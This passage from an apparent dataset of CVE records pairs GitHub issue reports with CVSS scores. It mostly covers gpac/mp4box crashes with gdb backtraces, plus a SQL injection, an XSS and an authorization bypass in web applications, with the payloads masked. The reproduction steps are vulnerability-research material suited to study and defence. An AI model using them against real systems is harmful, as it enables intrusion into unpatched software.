  70919. "Issue_Url_old": "https://github.com/OS4ED/openSIS-Classic/issues/191",
  70920. "Issue_Url_new": "https://github.com/os4ed/opensis-classic/issues/191",
  70921. "Repo_new": "os4ed/opensis-classic",
  70922. "Issue_Created_At": "2021-09-01T10:55:25Z",
  70923. "description": "Unauthenticated SQL Injection in FILETAG file. Author: APITAG from NUMBERTAG n NUMBERTAG cta team, HPT APITAG Center Email: EMAILTAG Submit date: PATHTAG Target: FILETAG Version NUMBERTAG FILETAG Description: Because of lacking of sanitizer of input data at two parameters APITAG and APITAG in APITAG file, The Unauthenticated user can inject sql code and get all information in the database FILETAG Use sqlmap tool dump users of database FILETAG To Reproduce SQL INJECTION Steps to reproduce the behavior NUMBERTAG Access APITAG file NUMBERTAG Add APITAG behind APITAG file Request CODETAG Response CODETAG",
  70924. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  70925. "severity": "CRITICAL",
  70926. "baseScore": 9.8,
  70927. "impactScore": 5.9,
  70928. "exploitabilityScore": 3.9
  70929. },
  70930. {
  70931. "CVE_ID": "CVE-2021-40559",
  70932. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1886",
  70933. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1886",
  70934. "Repo_new": "gpac/gpac",
  70935. "Issue_Created_At": "2021-08-24T07:11:15Z",
  70936. "description": "Segmentation fault caused by null pointer dereference using mp4box in naludmx_parse_nal_avc, APITAG FILETAG (unzip first) Here is the trace reported by gdb NUMBERTAG ac NUMBERTAG in naludmx_parse_nal_avc (ct NUMBERTAG a NUMBERTAG data NUMBERTAG f NUMBERTAG tr NUMBERTAG size NUMBERTAG e, nal_type NUMBERTAG skip_nal NUMBERTAG fffffff4fc4, is_slice NUMBERTAG fffffff4fd0, is_islice NUMBERTAG fffffff4fd4) at PATHTAG NUMBERTAG ad7d3 in naludmx_process (filter NUMBERTAG cbe0) at PATHTAG NUMBERTAG a0 in gf_filter_process_task (task NUMBERTAG eee0) at PATHTAG NUMBERTAG c in gf_fs_thread_proc (sess_thread NUMBERTAG e0) at PATHTAG NUMBERTAG in gf_fs_run (fsess NUMBERTAG at PATHTAG NUMBERTAG ea in gf_media_import (importer NUMBERTAG fffffff5bf0) at PATHTAG NUMBERTAG cdf9 in convert_file_info APITAG \"tmp\", APITAG at PATHTAG NUMBERTAG c3 in APITAG (argc NUMBERTAG arg NUMBERTAG fffffffddb8) at PATHTAG NUMBERTAG d6b in main (argc NUMBERTAG arg NUMBERTAG fffffffddb8) at PATHTAG NUMBERTAG caaa NUMBERTAG in generic_start_main NUMBERTAG caaff5 in __libc_start_main NUMBERTAG f NUMBERTAG in _start () ~~~~",
  70937. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70938. "severity": "MEDIUM",
  70939. "baseScore": 5.5,
  70940. "impactScore": 3.6,
  70941. "exploitabilityScore": 1.8
  70942. },
  70943. {
  70944. "CVE_ID": "CVE-2021-40562",
  70945. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1901",
  70946. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1901",
  70947. "Repo_new": "gpac/gpac",
  70948. "Issue_Created_At": "2021-08-29T14:05:34Z",
  70949. "description": "Segmentation fault caused by floating point exception using mp4box in naludmx_enqueue_or_dispatch, APITAG FILETAG (unzip first) Program output: ~~~~ [AVC|H NUMBERTAG Possible Variable Frame Rate: VUI \"fixed_frame_rate_flag\" absent [AVC|H NUMBERTAG Warning: Error parsing NAL unit [AVC|H NUMBERTAG Error parsing Sequence Param Set APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! [AVC|H NUMBERTAG Possible Variable Frame Rate: VUI \"fixed_frame_rate_flag\" absent [AVC|H NUMBERTAG Possible Variable Frame Rate: VUI \"fixed_frame_rate_flag\" absent [AVC|H NUMBERTAG Possible Variable Frame Rate: VUI \"fixed_frame_rate_flag\" absent [AVC|H NUMBERTAG Possible Variable Frame Rate: VUI \"fixed_frame_rate_flag\" absent [AVC|H NUMBERTAG Possible Variable Frame Rate: VUI \"fixed_frame_rate_flag\" absent Floating point exception (core dumped) ~~~~ Here is the trace reported by gdb: ~~~~ Stopped reason: SIGFPE gef\u27a4 bt NUMBERTAG ee NUMBERTAG in naludmx_enqueue_or_dispatch (ct NUMBERTAG ada NUMBERTAG n_pck NUMBERTAG flush_ref=<optimized out>) at PATHTAG NUMBERTAG e NUMBERTAG in naludmx_process APITAG at PATHTAG NUMBERTAG f4a in naludmx_process (filter NUMBERTAG a0bd0) at PATHTAG NUMBERTAG fe4c NUMBERTAG in gf_filter_process_task (task NUMBERTAG ed0) at PATHTAG NUMBERTAG f7b NUMBERTAG in gf_fs_thread_proc APITAG at PATHTAG NUMBERTAG f NUMBERTAG in gf_fs_run (fsess=fsess APITAG at PATHTAG NUMBERTAG c NUMBERTAG b4b in gf_media_import APITAG at PATHTAG NUMBERTAG in convert_file_info APITAG \"tmp\", APITAG at PATHTAG NUMBERTAG aaa in APITAG (argc=<optimized out>, argv=<optimized out>) at PATHTAG NUMBERTAG f NUMBERTAG bb6 in generic_start_main NUMBERTAG f NUMBERTAG a5 in __libc_start_main NUMBERTAG c4e9 in _start () ~~~~",
  70950. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70951. "severity": "MEDIUM",
  70952. "baseScore": 5.5,
  70953. "impactScore": 3.6,
  70954. "exploitabilityScore": 1.8
  70955. },
  70956. {
  70957. "CVE_ID": "CVE-2021-40563",
  70958. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1892",
  70959. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1892",
  70960. "Repo_new": "gpac/gpac",
  70961. "Issue_Created_At": "2021-08-25T07:12:15Z",
  70962. "description": "Segmentation fault caused by null pointer dereference using mp4box in APITAG APITAG FILETAG (unzip first) Here is the trace reported by gdb: ~~~~ Stopped reason: SIGSEGV gef\u27a4 bt NUMBERTAG in APITAG (ctx=ctx APITAG dsi=dsi APITAG APITAG APITAG APITAG APITAG max_height NUMBERTAG fffffff4d NUMBERTAG max_enh_width NUMBERTAG fffffff4d NUMBERTAG APITAG sar NUMBERTAG fffffff4d NUMBERTAG at PATHTAG NUMBERTAG ab in naludmx_check_pid APITAG ctx=ctx APITAG at PATHTAG NUMBERTAG in naludmx_process (filter NUMBERTAG a0bd0) at PATHTAG NUMBERTAG fe4c NUMBERTAG in gf_filter_process_task (task NUMBERTAG ed0) at PATHTAG NUMBERTAG f7b NUMBERTAG in gf_fs_thread_proc APITAG at PATHTAG NUMBERTAG f NUMBERTAG in gf_fs_run (fsess=fsess APITAG at PATHTAG NUMBERTAG c NUMBERTAG b4b in gf_media_import APITAG at PATHTAG NUMBERTAG in convert_file_info APITAG \"tmp\", APITAG at PATHTAG NUMBERTAG aaa in APITAG (argc=<optimized out>, argv=<optimized out>) at PATHTAG NUMBERTAG f NUMBERTAG bb6 in generic_start_main NUMBERTAG f NUMBERTAG a5 in __libc_start_main NUMBERTAG c4e9 in _start () ~~~~ The reason for this bug is that the program does not check the nullity of the pointer. APITAG",
  70963. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70964. "severity": "MEDIUM",
  70965. "baseScore": 5.5,
  70966. "impactScore": 3.6,
  70967. "exploitabilityScore": 1.8
  70968. },
  70969. {
  70970. "CVE_ID": "CVE-2021-40565",
  70971. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1902",
  70972. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1902",
  70973. "Repo_new": "gpac/gpac",
  70974. "Issue_Created_At": "2021-08-29T14:14:22Z",
  70975. "description": "Segmentation fault caused by null pointer dereference using mp4box in gf_avc_parse_nalu, APITAG FILETAG (unzip first) Program output: ~~~~ APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG corrupted exp golomb code NUMBERTAG leading zeros, ma NUMBERTAG allowed ! APITAG corrupted exp golomb code NUMBERTAG leading zeros, ma NUMBERTAG allowed ! APITAG corrupted exp golomb code NUMBERTAG leading zeros, ma NUMBERTAG allowed ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG exp golomb read failed, not enough bits in bitstream ! APITAG corrupted exp golomb code NUMBERTAG leading zeros, ma NUMBERTAG allowed ! APITAG corrupted exp golomb code NUMBERTAG leading zeros, ma NUMBERTAG allowed ! APITAG corrupted exp golomb code NUMBERTAG leading zeros, ma NUMBERTAG allowed ! APITAG corrupted exp golomb code NUMBERTAG leading zeros, ma NUMBERTAG allowed ! APITAG corrupted exp golomb code NUMBERTAG leading zeros, ma NUMBERTAG allowed ! Segmentation fault (core dumped) ~~~~ Here is the trace reported by gdb: ~~~~ Stopped reason: SIGSEGV gef\u27a4 bt NUMBERTAG bd NUMBERTAG in gf_avc_parse_nalu (bs=<optimized out>, avc NUMBERTAG ae NUMBERTAG at PATHTAG NUMBERTAG d in naludmx_parse_nal_avc (is_islice=<synthetic pointer>, is_slice=<synthetic pointer>, skip_nal=<synthetic pointer>, nal_type NUMBERTAG size NUMBERTAG b, data NUMBERTAG e NUMBERTAG ct NUMBERTAG ada NUMBERTAG at PATHTAG NUMBERTAG naludmx_process (filter NUMBERTAG a0bd0) at PATHTAG NUMBERTAG fe4c NUMBERTAG in gf_filter_process_task (task NUMBERTAG d NUMBERTAG at PATHTAG NUMBERTAG f7b NUMBERTAG in gf_fs_thread_proc APITAG at PATHTAG NUMBERTAG f NUMBERTAG in gf_fs_run (fsess=fsess APITAG at PATHTAG NUMBERTAG c NUMBERTAG b4b in gf_media_import APITAG at PATHTAG NUMBERTAG in convert_file_info APITAG \"tmp\", APITAG at PATHTAG NUMBERTAG aaa in APITAG (argc=<optimized out>, argv=<optimized out>) at PATHTAG NUMBERTAG f NUMBERTAG bb6 in generic_start_main NUMBERTAG f NUMBERTAG a5 in __libc_start_main NUMBERTAG c4e9 in _start () ~~~~",
  70976. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70977. "severity": "MEDIUM",
  70978. "baseScore": 5.5,
  70979. "impactScore": 3.6,
  70980. "exploitabilityScore": 1.8
  70981. },
  70982. {
  70983. "CVE_ID": "CVE-2021-40566",
  70984. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1887",
  70985. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1887",
  70986. "Repo_new": "gpac/gpac",
  70987. "Issue_Created_At": "2021-08-24T08:04:48Z",
  70988. "description": "Segmentation fault caused by null pointer dereference using mp4box in mpgviddmx_process, APITAG FILETAG (unzip first) Here is the trace reported by gdb: ~~~~ Stopped reason: SIGSEGV gef\u27a4 bt NUMBERTAG cf5a9b in memcpy NUMBERTAG a NUMBERTAG a7 in mpgviddmx_process (filter NUMBERTAG cbd0) at PATHTAG NUMBERTAG a0 in gf_filter_process_task (task NUMBERTAG a0e0) at PATHTAG NUMBERTAG c in gf_fs_thread_proc (sess_thread NUMBERTAG b0) at PATHTAG NUMBERTAG in gf_fs_run (fsess NUMBERTAG at PATHTAG NUMBERTAG ea in gf_media_import (importer NUMBERTAG fffffff5c NUMBERTAG at PATHTAG NUMBERTAG cdf9 in convert_file_info APITAG \"tmp\", APITAG at PATHTAG NUMBERTAG c3 in APITAG (argc NUMBERTAG arg NUMBERTAG fffffffdde8) at PATHTAG NUMBERTAG d6b in main (argc NUMBERTAG arg NUMBERTAG fffffffdde8) at PATHTAG NUMBERTAG caaa NUMBERTAG in generic_start_main NUMBERTAG caaff5 in __libc_start_main NUMBERTAG f NUMBERTAG in _start () ~~~~ The reason for this bug is that the program does not check the nullity of the pointer before copying memory to it. APITAG",
  70989. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  70990. "severity": "MEDIUM",
  70991. "baseScore": 5.5,
  70992. "impactScore": 3.6,
  70993. "exploitabilityScore": 1.8
  70994. },
  70995. {
  70996. "CVE_ID": "CVE-2021-40567",
  70997. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1889",
  70998. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1889",
  70999. "Repo_new": "gpac/gpac",
  71000. "Issue_Created_At": "2021-08-24T11:14:59Z",
  71001. "description": "Segmentation fault using mp4box in gf_odf_size_descriptor, APITAG FILETAG (unzip first) Here is the trace reported by gdb: ~~~~ Stopped reason: SIGSEGV gef\u27a4 bt NUMBERTAG a NUMBERTAG e8 in gf_odf_size_descriptor (desc NUMBERTAG e NUMBERTAG a0, APITAG at PATHTAG NUMBERTAG aeaaee in gf_odf_size_dcd (dcd NUMBERTAG fffffff6ae0, APITAG at PATHTAG NUMBERTAG a NUMBERTAG b NUMBERTAG in gf_odf_size_descriptor APITAG APITAG at PATHTAG NUMBERTAG aeade9 in gf_odf_write_dcd (bs NUMBERTAG a NUMBERTAG dcd NUMBERTAG fffffff6ae0) at PATHTAG NUMBERTAG a NUMBERTAG bd in gf_odf_write_descriptor (bs=bs APITAG APITAG at PATHTAG NUMBERTAG af NUMBERTAG in gf_odf_desc_write_bs APITAG bs=bs APITAG at PATHTAG NUMBERTAG af NUMBERTAG b7 in gf_odf_desc_write APITAG APITAG APITAG at PATHTAG NUMBERTAG af NUMBERTAG f6 in gf_odf_desc_copy APITAG APITAG at PATHTAG NUMBERTAG d2a3f in gf_isom_set_extraction_slc APITAG APITAG APITAG APITAG at PATHTAG NUMBERTAG ce NUMBERTAG ff in gf_hinter_finalize (file=file APITAG APITAG out>, APITAG at PATHTAG NUMBERTAG c NUMBERTAG in APITAG (file NUMBERTAG c NUMBERTAG APITAG max_ptime NUMBERTAG rtp_rate NUMBERTAG base_flags=<optimized out>, copy_data=GF_FALSE, interleave=GF_FALSE, regular_iod=GF_FALSE, single_group=GF_FALSE, hint_no_offset=GF_FALSE) at PATHTAG NUMBERTAG bd NUMBERTAG in APITAG (argc=<optimized out>, argv=<optimized out>) at PATHTAG NUMBERTAG f NUMBERTAG bb6 in generic_start_main NUMBERTAG f NUMBERTAG a5 in __libc_start_main NUMBERTAG c4e9 in _start () ~~~~",
  71002. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  71003. "severity": "MEDIUM",
  71004. "baseScore": 5.5,
  71005. "impactScore": 3.6,
  71006. "exploitabilityScore": 1.8
  71007. },
  71008. {
  71009. "CVE_ID": "CVE-2021-40569",
  71010. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1890",
  71011. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1890",
  71012. "Repo_new": "gpac/gpac",
  71013. "Issue_Created_At": "2021-08-25T05:36:34Z",
  71014. "description": "Segmentation fault caused by double free using mp4box in gf_free, APITAG FILETAG (unzip first) Here is the trace reported by gdb: ~~~~ Stopped reason: SIGSEGV gef\u27a4 bt NUMBERTAG f NUMBERTAG acf in free NUMBERTAG de4d in gf_free (ptr=<optimized out>) at PATHTAG NUMBERTAG f3d5d in iloc_entry_del (location NUMBERTAG dd NUMBERTAG at PATHTAG NUMBERTAG iloc_box_del (s NUMBERTAG f NUMBERTAG at PATHTAG NUMBERTAG fa NUMBERTAG f in gf_isom_box_del (a NUMBERTAG f NUMBERTAG at PATHTAG NUMBERTAG b5c in gf_isom_box_parse_ex APITAG bs=bs APITAG APITAG parent_type NUMBERTAG at PATHTAG NUMBERTAG cf2 in gf_isom_parse_root_box APITAG bs NUMBERTAG c NUMBERTAG box_type=box_type APITAG APITAG APITAG at PATHTAG NUMBERTAG f in APITAG (mov=mov APITAG APITAG APITAG APITAG at PATHTAG NUMBERTAG e NUMBERTAG in gf_isom_parse_movie_boxes (progressive_mode=GF_FALSE, APITAG APITAG mo NUMBERTAG c NUMBERTAG at PATHTAG NUMBERTAG gf_isom_open_file APITAG \"tmp\", APITAG out>, tmp_dir NUMBERTAG at PATHTAG NUMBERTAG a NUMBERTAG in APITAG (argc=<optimized out>, argv=<optimized out>) at PATHTAG NUMBERTAG f NUMBERTAG bb6 in generic_start_main NUMBERTAG f NUMBERTAG a5 in __libc_start_main NUMBERTAG c4e9 in _start () ~~~~ It appears that the pointer had already been freed earlier in configfile.c, so iloc_entry_del frees it a second time: ~~~~ APITAG ~~~~",
  71015. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  71016. "severity": "MEDIUM",
  71017. "baseScore": 5.5,
  71018. "impactScore": 3.6,
  71019. "exploitabilityScore": 1.8
  71020. },
  71021. {
  71022. "CVE_ID": "CVE-2021-40572",
  71023. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1893",
  71024. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1893",
  71025. "Repo_new": "gpac/gpac",
  71026. "Issue_Created_At": "2021-08-25T07:18:42Z",
  71027. "description": "Abort (SIGABRT raised from free()) caused by a double free using mp4box in a NUMBERTAG dmx_finalize, APITAG FILETAG (unzip first) Here is the trace reported by gdb: ~~~~ Stopped reason: SIGABRT gef\u27a4 bt NUMBERTAG f NUMBERTAG d NUMBERTAG in raise NUMBERTAG f NUMBERTAG f3a in abort NUMBERTAG f NUMBERTAG ed6 in __libc_message NUMBERTAG f2da NUMBERTAG in _int_free NUMBERTAG f NUMBERTAG af7 in free NUMBERTAG de4d in gf_free (ptr=<optimized out>) at PATHTAG NUMBERTAG e3d4d in a NUMBERTAG dmx_finalize (filter=<optimized out>) at PATHTAG NUMBERTAG f NUMBERTAG c in gf_fs_del (fsess=fsess APITAG at PATHTAG NUMBERTAG c1a NUMBERTAG a in gf_media_import APITAG at PATHTAG NUMBERTAG in convert_file_info APITAG \"tmp\", APITAG at PATHTAG NUMBERTAG aaa in APITAG (argc=<optimized out>, argv=<optimized out>) at PATHTAG NUMBERTAG f NUMBERTAG bb6 in generic_start_main NUMBERTAG f NUMBERTAG a5 in __libc_start_main NUMBERTAG c4e9 in _start () ~~~~",
  71028. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  71029. "severity": "MEDIUM",
  71030. "baseScore": 5.5,
  71031. "impactScore": 3.6,
  71032. "exploitabilityScore": 1.8
  71033. },
  71034. {
  71035. "CVE_ID": "CVE-2021-40573",
  71036. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1891",
  71037. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1891",
  71038. "Repo_new": "gpac/gpac",
  71039. "Issue_Created_At": "2021-08-25T06:44:03Z",
  71040. "description": "Crash (SIGSEGV inside free()) caused by a double free using mp4box. FILETAG (unzip first) Here is the trace reported by gdb: ~~~~ Stopped reason: SIGSEGV gef\u27a4 bt NUMBERTAG f NUMBERTAG acf in free NUMBERTAG de4d in gf_free (ptr=<optimized out>) at PATHTAG NUMBERTAG f3d5d in iloc_entry_del (location NUMBERTAG dd NUMBERTAG at PATHTAG NUMBERTAG iloc_box_del (s NUMBERTAG f NUMBERTAG at PATHTAG NUMBERTAG fa NUMBERTAG f in gf_isom_box_del (a NUMBERTAG f NUMBERTAG at PATHTAG NUMBERTAG b5c in gf_isom_box_parse_ex APITAG bs=bs APITAG APITAG parent_type NUMBERTAG at PATHTAG NUMBERTAG cf2 in gf_isom_parse_root_box APITAG bs NUMBERTAG c NUMBERTAG box_type=box_type APITAG APITAG APITAG at PATHTAG NUMBERTAG f in APITAG (mov=mov APITAG APITAG APITAG APITAG at PATHTAG NUMBERTAG e NUMBERTAG in gf_isom_parse_movie_boxes (progressive_mode=GF_FALSE, APITAG APITAG mo NUMBERTAG c NUMBERTAG at PATHTAG NUMBERTAG gf_isom_open_file APITAG \"tmp\", APITAG out>, tmp_dir NUMBERTAG at PATHTAG NUMBERTAG a NUMBERTAG in APITAG (argc=<optimized out>, argv=<optimized out>) at PATHTAG NUMBERTAG f NUMBERTAG bb6 in generic_start_main NUMBERTAG f NUMBERTAG a5 in __libc_start_main NUMBERTAG c4e9 in _start () ~~~~",
  71041. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  71042. "severity": "MEDIUM",
  71043. "baseScore": 5.5,
  71044. "impactScore": 3.6,
  71045. "exploitabilityScore": 1.8
  71046. },
  71047. {
  71048. "CVE_ID": "CVE-2021-40576",
  71049. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1904",
  71050. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1904",
  71051. "Repo_new": "gpac/gpac",
  71052. "Issue_Created_At": "2021-08-31T12:13:57Z",
  71053. "description": "Segmentation fault caused by null pointer dereference using mp4box in gf_isom_get_payt_count, APITAG FILETAG (unzip first) Here is the trace reported by gdb: ~~~~ Stopped reason: SIGSEGV gef\u27a4 bt NUMBERTAG ab4f NUMBERTAG in gf_isom_get_payt_count APITAG APITAG at PATHTAG NUMBERTAG in APITAG (file=file APITAG APITAG APITAG APITAG APITAG APITAG at PATHTAG NUMBERTAG d NUMBERTAG in APITAG (file NUMBERTAG c NUMBERTAG full_dump=GF_FALSE) at PATHTAG NUMBERTAG in APITAG (argc=<optimized out>, argv=<optimized out>) at PATHTAG NUMBERTAG f NUMBERTAG in generic_start_main NUMBERTAG f NUMBERTAG f NUMBERTAG in __libc_start_main NUMBERTAG c4e9 in _start () ~~~~",
  71054. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  71055. "severity": "MEDIUM",
  71056. "baseScore": 5.5,
  71057. "impactScore": 3.6,
  71058. "exploitabilityScore": 1.8
  71059. },
  71060. {
  71061. "CVE_ID": "CVE-2021-40592",
  71062. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1876",
  71063. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1876",
  71064. "Repo_new": "gpac/gpac",
  71065. "Issue_Created_At": "2021-08-16T09:08:59Z",
  71066. "description": "Infinite loop in APITAG. Hi. There is an infinite loop bug in APITAG. To reproduce, run the command below with the attached file. APITAG FILETAG Credit: APITAG of Venustech",
  71067. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  71068. "severity": "MEDIUM",
  71069. "baseScore": 5.5,
  71070. "impactScore": 3.6,
  71071. "exploitabilityScore": 1.8
  71072. },
  71073. {
  71074. "CVE_ID": "CVE-2021-40606",
  71075. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1885",
  71076. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1885",
  71077. "Repo_new": "gpac/gpac",
  71078. "Issue_Created_At": "2021-08-24T02:45:45Z",
  71079. "description": "Bug: memcpy from an unknown address. It's a memcpy-from-unknown-address bug. Steps to reproduce NUMBERTAG get latest commit code (GPAC version NUMBERTAG DEV re NUMBERTAG g NUMBERTAG ba NUMBERTAG master NUMBERTAG compile with sanitizer enabled NUMBERTAG run ./MP4BOX hint poc_isom_hinter out /dev/null Env: Ubuntu NUMBERTAG clang NUMBERTAG ASAN report ERRORTAG Buggy code in bitstream.c: CODETAG FILETAG",
  71080. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  71081. "severity": "MEDIUM",
  71082. "baseScore": 5.5,
  71083. "impactScore": 3.6,
  71084. "exploitabilityScore": 1.8
  71085. },
  71086. {
  71087. "CVE_ID": "CVE-2021-40607",
  71088. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1879",
  71089. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1879",
  71090. "Repo_new": "gpac/gpac",
  71091. "Issue_Created_At": "2021-08-19T02:52:37Z",
  71092. "description": "heap buffer overflow in schm_box_size. It's a heap buffer overflow bug caused by a missing NUMBERTAG check for the end of the URI. Steps to reproduce NUMBERTAG get latest commit code APITAG GPAC version NUMBERTAG DEV re NUMBERTAG gbbd NUMBERTAG e master NUMBERTAG compile with sanitizer enabled NUMBERTAG run ./MP4BOX hint poc out /dev/null Env: Ubuntu NUMBERTAG clang NUMBERTAG ASAN report ERRORTAG Buggy code and reason: CODETAG FILETAG",
  71093. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  71094. "severity": "MEDIUM",
  71095. "baseScore": 5.5,
  71096. "impactScore": 3.6,
  71097. "exploitabilityScore": 1.8
  71098. },
  71099. {
  71100. "CVE_ID": "CVE-2021-40608",
  71101. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1883",
  71102. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1883",
  71103. "Repo_new": "gpac/gpac",
  71104. "Issue_Created_At": "2021-08-20T05:15:45Z",
  71105. "description": "BUG: free on an unknown address. It's a free-on-unknown-address bug caused by freeing an uninitialized pointer. Steps to reproduce NUMBERTAG get latest commit code (GPAC version NUMBERTAG DEV re NUMBERTAG g NUMBERTAG ba NUMBERTAG master NUMBERTAG compile with sanitizer enabled NUMBERTAG run ./MP4BOX hint poc_isom_hinter out /dev/null Env: Ubuntu NUMBERTAG clang NUMBERTAG ASAN report ERRORTAG Buggy code and reason: in APITAG CODETAG It is supposed to initialize t NUMBERTAG g in APITAG, but in APITAG that initialization may be skipped, so the pointer is later freed without ever having been set. CODETAG FILETAG",
  71106. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  71107. "severity": "MEDIUM",
  71108. "baseScore": 5.5,
  71109. "impactScore": 3.6,
  71110. "exploitabilityScore": 1.8
  71111. },
  71112. {
  71113. "CVE_ID": "CVE-2021-40610",
  71114. "Issue_Url_old": "https://github.com/blackQvQ/emlog/issues/1",
  71115. "Issue_Url_new": "https://github.com/blackqvq/emlog/issues/1",
  71116. "Repo_new": "blackqvq/emlog",
  71117. "Issue_Created_At": "2021-09-01T07:31:56Z",
  71118. "description": "emlog pro NUMBERTAG management XSS Vulnerability. \u5728\u540e\u53f0\u7ba1\u7406\u7684\u5199\u6587\u7ae0\u6709\u4e24\u4e2a\u53ef\u5199\u5165xss \u6587\u7ae0\u6807\u9898 FILETAG \u9700\u8981\u8bc4\u8bba\u89e6\u53d1 FILETAG FILETAG \u8fd8\u6709\u4e00\u4e2a\u5728\u524d\u53f0\u89e6\u53d1 FILETAG FILETAG \u8fd8\u6709\u7cfb\u7edf\u8bbe\u7f6e\u7684\u9996\u9875\u4f4e\u90e8\u4fe1\u606f FILETAG FILETAG",
  71119. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  71120. "severity": "MEDIUM",
  71121. "baseScore": 5.4,
  71122. "impactScore": 2.7,
  71123. "exploitabilityScore": 2.3
  71124. },
  71125. {
  71126. "CVE_ID": "CVE-2021-40616",
  71127. "Issue_Url_old": "https://github.com/thinkcmf/thinkcmf/issues/722",
  71128. "Issue_Url_new": "https://github.com/thinkcmf/thinkcmf/issues/722",
  71129. "Repo_new": "thinkcmf/thinkcmf",
  71130. "Issue_Created_At": "2021-09-01T09:17:18Z",
  71131. "description": "thinkcmf NUMBERTAG authorization bypass vulnerability. thinkcmf NUMBERTAG has an authorization bypass. An attacker who holds the back-end user-management group permission can modify the password of the administrator account with id NUMBERTAG. Exploitation requires that back-end user-management group permission. By design, the password of the administrator account with id NUMBERTAG is not supposed to be modifiable this way. Vulnerable PATHTAG FILETAG Browser access PATHTAG modifies the password of the administrator account with id NUMBERTAG FILETAG",
  71132. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
  71133. "severity": "MEDIUM",
  71134. "baseScore": 6.5,
  71135. "impactScore": 3.6,
  71136. "exploitabilityScore": 2.8
  71137. },
  71138. {
  71139. "CVE_ID": "CVE-2021-40617",
  71140. "Issue_Url_old": "https://github.com/OS4ED/openSIS-Classic/issues/192",
  71141. "Issue_Url_new": "https://github.com/os4ed/opensis-classic/issues/192",
  71142. "Repo_new": "os4ed/opensis-classic",
